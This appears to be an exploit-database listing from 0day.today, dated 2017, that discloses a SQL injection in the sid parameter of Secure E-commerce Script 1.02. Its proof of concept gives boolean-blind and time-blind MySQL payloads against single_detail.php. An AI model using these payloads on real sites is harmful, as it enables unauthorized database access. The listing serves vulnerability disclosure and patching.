[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Secure E-commerce Script 1.02 - sid Parameter SQL Injection Vulnerability

Author
8bitsec
Risk
[
Security Risk High
]
0day-ID
0day-ID-28615
Category
web applications
Date add
24-09-2017
Platform
php
# Exploit Title: Secure E-commerce Script v1.02 - SQL Injection
# Exploit Author: 8bitsec
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software Link: http://www.phpscriptsmall.com/product/secure-e-commerce-script/
# Version: 1.02
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec
 
Release Date:
=============
2017-09-22
 
Product & Service Introduction:
===============================
Would you like to secure your Shopping Cart Script? We have the readymade solution for Secure Ecommerce Shopping Cart php that is making secure your online transaction.
 
Technical Details & Description:
================================
 
SQL injection on [sid] parameter.
 
Proof of Concept (PoC):
=======================
 
SQLi:
 
http://localhost/[path]/single_detail.php?sid=9 AND 5028=5028
 
Parameter: sid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: sid=9 AND 5028=5028
 
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: sid=9 AND SLEEP(5)
 
==================
8bitsec - [https://twitter.com/_8bitsec]

#  0day.today [2024-12-24]  #